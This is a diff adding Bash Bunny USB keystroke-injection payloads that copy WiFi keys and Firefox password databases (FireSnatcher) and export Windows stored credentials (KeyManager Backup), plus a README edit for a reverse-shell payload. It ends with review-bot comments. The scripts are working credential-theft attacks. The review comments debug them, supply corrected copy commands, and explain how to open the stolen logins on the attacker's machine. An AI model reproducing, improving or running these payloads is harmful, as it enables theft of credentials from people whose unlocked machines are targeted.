diff --git a/payloads/library/credentials/FireSnatcher/FireSnatcher.bat b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat new file mode 100644 index 00000000..d08c8229 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat @@ -0,0 +1,6 @@ +mkdir %~dp0\loot\%COMPUTERNAME% +cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear +C: cd \D %appdata%\mozilla\firefox\profiles\ +cd %appdata%\mozilla\firefox\profiles\*.default-release\ +copy key4.db %~dp0\loot\%COMPUTERNAME% +copy logins.json %~dp0\loot\%COMPUTERNAME% \ No newline at end of file diff --git a/payloads/library/credentials/FireSnatcher/README.md b/payloads/library/credentials/FireSnatcher/README.md new file mode 100644 index 00000000..1d3b0dd0 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/README.md 
@@ -0,0 +1,45 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +**LED meanings** +- Magenta: Initial setup – about 1 – 3 seconds +- Single yellow blink: Attack in progress +- Green rapid flash, then solid, then off: Attack complete diff --git a/payloads/library/credentials/FireSnatcher/payload.txt b/payloads/library/credentials/FireSnatcher/payload.txt new file mode 100644 index 00000000..143efd55 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/payload.txt 
@@ -0,0 +1,78 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +# LEDs +# ---- +# Magenta: Initial setup – about 1 – 3 seconds +# Single yellow blink: Attack in progress +# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed + +# Options +# ------- +# Name of Bash Bunny volume that appears to Windows (BashBunny is default) +BB_NAME="BashBunny" + +# Setup +# ----- +LED SETUP + + +# Attack +# ------ +ATTACKMODE HID STORAGE +Q DELAY 500 +LED ATTACK +Q DELAY 100 +Q GUI r +Q DELAY 100 +Q STRING powershell Start-Process powershell +Q ENTER +Q DELAY 7000 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')" +Q ENTER +Q DELAY 8000 +Q STRING EXIT +Q 
ENTER +sync +LED FINISH +Q DELAY 1500 +shutdown now + diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt new file mode 100644 index 00000000..48b0284a --- /dev/null +++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt @@ -0,0 +1,66 @@ +#!/bin/bash +# Title: KeyManager Backup +# Description: Create a backup of the key manager which stores log-on credentials for servers, websites and programs +# Author: Cribbit +# Version: 1.0 +# Category: Exfiltration +# Target on: Windows 10 +# Attackmodes: HID & STORAGE +# Extensions: Run +# Props: Paranoid Ninja + +####################### Config ####################### +password=lamepassword +##################### End Config ##################### + +LED SETUP + +ATTACKMODE HID STORAGE + +LED ATTACK + +QUACK DELAY 200 +RUN WIN "rundll32 keymgr.dll, KRShowKeyMgr" +QUACK DELAY 200 +# button: Backup up... +QUACK ALT b +QUACK DELAY 200 +# button: Browse... +QUACK ALT b +# file name +QUACK STRING "backup" +# select task bar +QUACK ALT d +QUACK DELAY 200 +# look for bunny +QUACK STRING "BashBunny" +QUACK DELAY 600 +#select drive +QUACK DOWNARROW +# add loot folder +QUACK STRING "/loot" +QUACK ENTER +QUACK DELAY 200 +# button: Save +QUACK ALT s +QUACK DELAY 200 +# button: Next +QUACK ALT n +QUACK DELAY 200 +# note: keycroc you can uses CTRL-ALT-DELETE +QUACK CTRL-ALT DELETE +QUACK DELAY 200 +QUACK STRING "$password" +QUACK TAB +QUACK STRING "$password" +# button: Next +QUACK ALT n +QUACK DELAY 300 +# button: Finish +QUACK ALT f +QUACK DELAY 200 +# button: Close +QUACK ALT c + +LED FINISH + diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md new file mode 100644 index 00000000..89c5fdbd --- /dev/null +++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md 
@@ -0,0 +1,30 @@ +# KeyManager Backup +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 +- Category: Exfiltration +- Attackmode: HID & STORAGE +- Extensions: Run +- Props: Paranoid Ninja https://twitter.com/NinjaParanoid/status/1516442028963659777 + +## Description +Create a backup of the key manager which stores log-on credentials for servers, websites and programs. + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Config +set the password for the backup by setting the `password` variable + +## Notes +This payload relays heavily on button shortcuts this mean it is very target to an English version of windows. +If you are targeting a different language, you will need to change the letter after the ALT key to the corresponding letter for the button. + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file diff --git a/payloads/library/remote_access/PingZhellBunny/README.md b/payloads/library/remote_access/PingZhellBunny/README.md index fe1bcb23..ac8ccd9f 100644 --- a/payloads/library/remote_access/PingZhellBunny/README.md +++ b/payloads/library/remote_access/PingZhellBunny/README.md @@ -24,18 +24,18 @@ Install dependencies, if needed: - NetPacket::ICMP Disable ICMP replies by the OS: - *sysctl -w net.ipv4.icmp_echo_ignore_all=1* + `sysctl -w net.ipv4.icmp_echo_ignore_all=1` Start Bunny.pl -> perl Bunny.pl # !!!Insert the IP of your attacking machine into PingZhell.ps1!!! # -Plug in Bashbunny with PingZhellBunny equipped. -Achieve reverse shell. -run away <3 +
Plug in Bashbunny with PingZhellBunny equipped.
+Achieve reverse shell.
+ run away <3
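Review bot: In FireSnatcher.bat the two `cd` lines meant to land in the Firefox profile directory do not work, so the two `copy` commands run from the loot directory and copy nothing. `C: cd \D %appdata%\mozilla\firefox\profiles\` uses `\D` where `/D` is meant (and is redundant anyway, since the next line uses an absolute path), and cmd's `cd` does not expand wildcards, so `cd %appdata%\mozilla\firefox\profiles\*.default-release\` fails with "The system cannot find the path specified". Resolve the profile with a `for /d` loop and copy from it instead, e.g. `for /d %%p in ("%APPDATA%\Mozilla\Firefox\Profiles\*.default-release") do copy "%%p\key4.db" "%~dp0loot\%COMPUTERNAME%\"` and the same for logins.json. Note that `%~dp0` already ends in a backslash, so `%~dp0\loot` yields a doubled separator (harmless, but worth tidying), and `netsh wlan export profile key=clear` could take an explicit `folder=` rather than relying on the working directory set by the preceding `cd /D`.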
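Review bot: The "HOW TO USE PASSWORD DB" instructions in FireSnatcher/README.md tell the reader to drop key4.db and logins.json into their own `%APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE` profile, which overwrites the reader's own saved logins; recommend a throwaway profile (about:profiles) instead. The README should also state that the copied database only yields plaintext if the target had no Firefox primary password set, since that password wraps the key stored in key4.db. The "KNOWN ISSUES" entry "Loot is saved in Payloads/switch#/loot" is a consequence of `%~dp0` in the .bat rather than a bug, so it belongs under Notes, not Known Issues. Finally, the `# Title:` through `# Attackmodes:` header copied from payload.txt renders as a stack of H1 headings in Markdown; either drop the `#` prefixes or use the `- Author:` bullet style that Win_HID_BackupKeyManager/readme.md in this same PR uses.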
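Review bot: The `BB_NAME="BashBunny"` option under Options in FireSnatcher/payload.txt is never used: the injected line hardcodes the label in `Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"`, so renaming the volume as the comment invites silently breaks the payload. Substitute `'label=''$BB_NAME'''` there; the string is already in bash double quotes, so it expands exactly as `$SWITCH_POSITION` does. Separately, the run is bounded by two fixed sleeps, `Q DELAY 7000` and `Q DELAY 8000`, while the header says the .bat takes about 20 seconds end to end; if the copy is still running when `Q STRING EXIT` is typed, the PowerShell window closes mid-copy and `sync` then `shutdown now` follow. Have the .bat drop a marker file in the loot directory when it finishes and loop in bash until that file exists before `sync`, rather than guessing the delay.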
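Review bot: The 200 ms waits in Win_HID_BackupKeyManager/payload.txt are the fragile part of this injection: `QUACK DELAY 200` follows `RUN WIN "rundll32 keymgr.dll, KRShowKeyMgr"` before the first `QUACK ALT b`, and again after `QUACK CTRL-ALT DELETE` before `QUACK STRING "$password"` is typed. The Stored User Names and Passwords dialog, and especially the secure-desktop prompt the backup wizard switches to on Ctrl+Alt+Del, usually take longer than that to appear, in which case the keystrokes (password included) go to whatever window is in the foreground. Raise those two delays; the 600 ms already used after `QUACK STRING "BashBunny"` is a better baseline. The default `password=lamepassword` is the only thing protecting the exported credential backup on the Bunny's storage, so the Config block should say to change it. Minor: `# button: Backup up...` should read `Back up...`, and `# note: keycroc you can uses CTRL-ALT-DELETE` should say which syntax applies on which device.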
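Review bot: The Notes paragraph in Win_HID_BackupKeyManager/readme.md has several grammar slips; "This payload relays heavily on button shortcuts this mean it is very target to an English version of windows." should read "This payload relies heavily on button shortcuts, which means it is tied to an English version of Windows." The readme also never says where the loot lands or how to use it: the payload saves a file named `backup` under the Bunny's `/loot` folder (the wizard writes a .crd backup), which is restored on the attacker's machine through the same `rundll32 keymgr.dll, KRShowKeyMgr` dialog via its Restore button using the configured `password`; add that to the Description or Config section so the `password` variable's purpose is clear.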
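Review bot: The last hunk's rewrite of the three closing lines of PingZhellBunny/README.md changes only whitespace, and inconsistently: `+ run away <3` gains a leading space that `+Plug in Bashbunny with PingZhellBunny equipped.` and `+Achieve reverse shell.` do not. If the intent is to render each on its own line in Markdown, use a list (`- Plug in ...`) or blank lines between them and drop the stray space. The change from `*sysctl -w net.ipv4.icmp_echo_ignore_all=1*` to backticks is right; while in this file, the `# !!!Insert the IP of your attacking machine into PingZhell.ps1!!! #` context line renders as an H1 heading rather than the comment it is evidently meant to be.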